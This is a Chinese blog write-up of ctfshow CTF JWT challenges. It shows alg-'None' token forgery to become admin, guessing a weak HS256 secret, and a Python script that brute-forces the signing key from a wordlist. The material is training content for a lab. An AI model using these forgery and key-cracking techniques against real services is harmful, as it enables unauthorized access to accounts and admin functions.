ctfshow web入门 jwt(持续更新)

最新推荐文章于 2024-06-03 11:02:59 发布
最新推荐文章于 2024-06-03 11:02:59 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: CTF 文章标签: web 安全 jwt
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46270220/article/details/119319739
版权

文章目录

基础知识

jwt是由三部分构成的,第一部分是头部(header),第二部分是载荷(payload),第三部分为签证(signature)

  1. 头部
    头部声明了类型和加密方法,如下
{
  'typ': 'JWT',
  'alg': 'HS256'
}

然后将头部进行base64加密后去掉=号,构成第一部分

ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9

  1. 载荷
    和头部结构类似,但存放的是数据

  2. 签证
    jwt的第三部分是一个签证信息,这个签证信息由三部分组成:

header (base64后的)
payload (base64后的)
secret
这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分。

web345

jwt:

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2Mjc4NzIwMDMsImV4cCI6MTYyNzg3OTIwMywibmJmIjoxNjI3ODcyMDAzLCJzdWIiOiJ1c2VyIiwianRpIjoiMThhN2UzY2M2ZmNiZTM0ZGU3NzFkYjY0ZWUzZjk5NTcifV0

jwt.io转换后,发现不存在第三部分的签证,也就不需要知道密钥

HEADER

{
  "alg": "None",
  "typ": "jwt"
}

PAYLOAD
[
  {
    "iss": "admin",
    "iat": 1627872003,
    "exp": 1627879203,
    "nbf": 1627872003,
    "sub": "user",
    "jti": "18a7e3cc6fcbe34de771db64ee3f9957"
  }
]

只要把sub中的user换成admin后在base64加密,然后访问/admin/即可

eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2Mjc4NzIzNDIsImV4cCI6MTYyNzg3OTU0MiwibmJmIjoxNjI3ODcyMzQyLCJzdWIiOiJ1c2VyIiwianRpIjoiMDM1YmI4YjVhMTNhZDhjYzgxOGFiODE0MGM3YjBiMGUifV0

web346-347

jwt:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYyNzg3MzYzMiwiZXhwIjoxNjI3ODgwODMyLCJuYmYiOjE2Mjc4NzM2MzIsInN1YiI6InVzZXIiLCJqdGkiOiJmNTRmNjQ1ZDA0ZTkxNzIzYWQyZWIxYmRjNmRiNjU5ZCJ9.vSZdnZzD-ESw-l8HJvPWJ0Tc7yshkK43BlWjVWwHcgA

解密后发现是hs256加密,还是把sub中的user改成admin,然后盲猜一手密钥123456
请添加图片描述
发现成功。

web348

看提示说要爆破,可以先生成一个1到4位的英文字典,然后用群主的脚本来爆破

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-05-06 16:34:57
# @Last Modified by:   h1xa
# @Last Modified time: 2021-05-06 19:34:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


import jwt
import json


def runblasting(path,jwt_str,alg):
    if alg == "none":
        alg = "HS256"
    with open(path,encoding='utf-8') as f:
        for line in f:
            key_ = line.strip()
            print('                               use '+key_)
            try:
                jwt.decode(jwt_str,verify=True,key=key_,algorithms=alg)
                print('found key! --> ' +  key_)
                break
            except(jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
                print('found key! --> ' +  key_)
                break
            except(jwt.exceptions.InvalidSignatureError):
                continue
        else:
            print("key not found!")

if __name__ == '__main__':
	runblasting('key.txt','eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYyNzg3NjQ4MCwiZXhwIjoxNjI3ODgzNjgwLCJuYmYiOjE2Mjc4NzY0ODAsInN1YiI6InVzZXIiLCJqdGkiOiJjMGYzODkwMmE1ODE4ZjhlMjM5Yzg3N2EwNzZmNmU5MCJ9.o68KTTbu7V2enU4dXXASeJs6rJbNbVbLtoEqC_WMqBo','HS256')
Lum1n0us
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
bugkuctf jwt
舞动的獾
11-13 1691
bugku jwt 查看页面源码,发现了注释,<!–hint:NNVTU23LGEZDG===–> 很像是base64,但是不是,解密结果为未知字符。又去注了半天,没有跑出密码,后来看了大佬的wp才发现是base32,无语,思维定型了,开始的时候想着试试base32,自己把自己否定了,我tcl了。 注释内容base32解密后是kk:kkk123,猜测是账户和密码,登陆成功 信息上要...
web api JWT token认证
04-24
Web API JWT Token认证是现代Web应用中一种常见的安全机制,用于保护API接口免受未经授权的访问。JWT(JSON Web Tokens)是一种轻量级的身份验证和授权机制,它允许客户端通过在请求头中发送一个令牌来证明其身份。...
ctfshow web入门 jwt
Sentiment的博客
12-10 2411
基础知识 jwt是由三部分构成的,第一部分是头部(header),第二部分是载荷(payload),第三部分为签证(signature) 头部 头部声明了类型和加密方法,如下 { 'typ': 'JWT', 'alg': 'HS256' } 然后将头部进行base64加密后去掉=号,构成第一部分 ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9 载荷 和头部结构类似,但存放的是数据 签证 jwt的第三部分是一个签证信息,这个签证信息由三部分组成:
ctfshow jwt web入门
最新发布
2301_81040377的博客
06-03 492
jwt令牌由三部分组成,由分割header示例payload示例。
【CTFSHOW】web入门 JWT
7ruth0hn的博客
09-27 984
文章目录写在前面JWT浅析web345web346web347web348web349web350参考资料 写在前面 陇剑杯初赛出了JWT专题的赛题,被同队大佬ak了,一直不太懂,来刷刷 JWT浅析 JWT即JSON WEB TOKEN,由三个部分组成,并用两个“.”进行连接。第一部分为header(base64加密),第二部分为payload(base64加密),第三部分为verify signature,它的构成如下: HEADER中alg对应的加密方式为HS256,也可以选择其他对称或非对称的加密方
JWT学习(ctfshow web入门jwt
qq_45766062的博客
11-20 1258
jwt介绍 ctfshow web入门jwt web345 工具:burp suite,jwt在线解码工具链接 分析:首先看到提示/admin 访问抓包,看到auth,实际上就是jwt: 然后,用在线工具解码:
ctfshow web入门 JWT
Anton1a的博客
02-24 4280
web345 打开题目先F12看一下源码发现一个admin目录,然后抓包看见cookie里面有jwt 然后将jwt进行base64解密,然后将解码后的user换成admin 再进行base64加密,然后抓包访问admin目录,之后将刚才生成的jwt,替换cookie里的jwt然后发包拿到flag 这里只需要注意访问的是/admin/而不是/admin因为访问/admin表示访问admin.php而访问/admin/表示访问的是admin目录下默认的index.php web346 这.
.Net WebAPi JWT身份验证
11-07
**.NET WebAPI JWT身份验证详解** 在现代Web应用程序中,安全性和权限管理是至关重要的。JSON Web Token(JWT)是一种轻量级的身份验证和授权机制,被广泛应用于API访问控制。本文将深入探讨如何在.NET Framework ...
WebApiDemo(net6+swagger+jwt)
05-31
WebApiDemo是一个基于.NET 6框架的Web API项目,它集成了Swagger用于接口文档的展示与测试,同时引入了JWT(JSON Web Token)进行身份验证和授权管理。这个项目是用Visual Studio 2022开发环境构建的,旨在提供一个...
.NET6平台开发WebApi-使用JWT进行用户鉴权和测试源码
02-21
在.NET6平台上开发WebAPI应用时,为了实现安全的用户身份验证和授权,通常会采用JSON Web Tokens(JWT)机制。JWT是一种轻量级的身份验证标准,它允许服务端为客户端颁发一个令牌,该令牌包含了用户的相关信息,且在...
.net core webapi jwt 更为清爽的认证详解
10-16
主要介绍了.net core webapi jwt 更为清爽的认证详解,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Net.WebApi_JWT.zip
09-11
表明这是一个关于.NET WebAPI与JWT(JSON Web Tokens)技术结合的项目压缩包。这个项目涵盖了多个重要的IT知识点,包括API文档的生成、身份验证、依赖注入以及数据库操作。 1. **.NET WebAPI**:.NET WebAPI是微软...
Webapi_JWT_Authentication-master_webapi_jwt_token_
10-03
WebAPI与JWT(JSON Web Tokens)身份验证是一种常见的安全机制,用于保护WebAPI接口免受未经授权的访问。JWT令牌提供了一种轻量级的方式来进行身份验证和授权,它允许服务器在客户端之间安全地传递信息,而无需存储...
c# JSON WEB TOKEN JWT.dll
07-18
生成token工具,webapi 接口 token JWTWeb API身份验证Json Web Token(jwt)是一种不错的身份验证及授权方案,简单的说就是调用端调用api时,附带上一个由api端颁发的token,以此来验证调用者的授权信息。
JWT(java web Token)
01-22
Java Web Token(JWT)是一种开放的标准(RFC 7519),定义了一种紧凑的、自包含的方式来安全地在各方之间传输信息作为一个JSON对象。这个信息可以被验证和信任,因为它是数字签名的。JWT在身份验证和授权场景中广泛...
SpringBoot集成JWT快速入门Demo
04-10
编译器版本:IntelliJ IDEA 2020.3.2 x64 JDK版本:java 1.8.0_111 SpringBoot集成JWT快速入门Demo,演示jwt生成与验证等功能,可以通过swaggler或者Postman进行测试。
CTF-Web jwt
Makabakahaha的博客
10-04 242
web做题记录
CTFSHOW jwt
羽的博客
12-30 5686
可以先了解下jwt jwt由三部分组成header、payload、signature header示例 { 'typ': 'JWT', 'alg': 'HS256' } payload示例 { "sub": "1234567890", "name": "John Doe" } signature jwt的第三部分是一个签证信息,这个签证信息由三部分组成: header (base64编码) payload (base64编码) secret(密钥) 这个部分需要base64加密后的he
CTF bukgu jwt
a3320315的博客
10-30 650
0x01 解题思路 1、我们先打开网址,查看源码得到hint<!--hint:NNVTU23LGEZDG===-->,这儿直接想到base64解码,但是一直解不出来,后来试了试base32解码,成功!(思维太局限了)。 2、解码成功后得到账号和密码kk:kk123 3、我们登录进去得到提示 diary中提到了vim,我们首先想到的就是源码泄露,于是我们直接用dirsearch脚本扫,...
ctfshow JWT
09-08
CTFShow JWT是一个由头部、有效载荷和签名三部分组成的JSON Web Token。其中,头部包含了JWT的类型和使用的算法,有效载荷包含了一些信息,比如发行者、颁发时间、过期时间等,签名则用于验证JWT的完整性和真实性。 在CTFShow中,可以通过改变JWT的头部和有效载荷来实现一些攻击或绕过验证的操作。例如,可以将头部的算法字段改为"none",将有效载荷中的用户字段改为"admin",以绕过网站的JWT算法限制。 为了生成这样的JWT,可以使用Python脚本来生成。脚本中使用了jwt库,通过指定合适的头部、有效载荷和算法来生成JWT。具体来说,可以将头部的算法字段设置为"none",将有效载荷中的用户字段设置为"admin"。生成的JWT可以用于攻击或验证绕过。 总结来说,CTFShow JWT是一个由头部、有效载荷和签名组成的JSON Web Token,在CTFShow中可以通过改变JWT的头部和有效载荷来实现一些攻击或绕过验证的操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lum1n0us

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值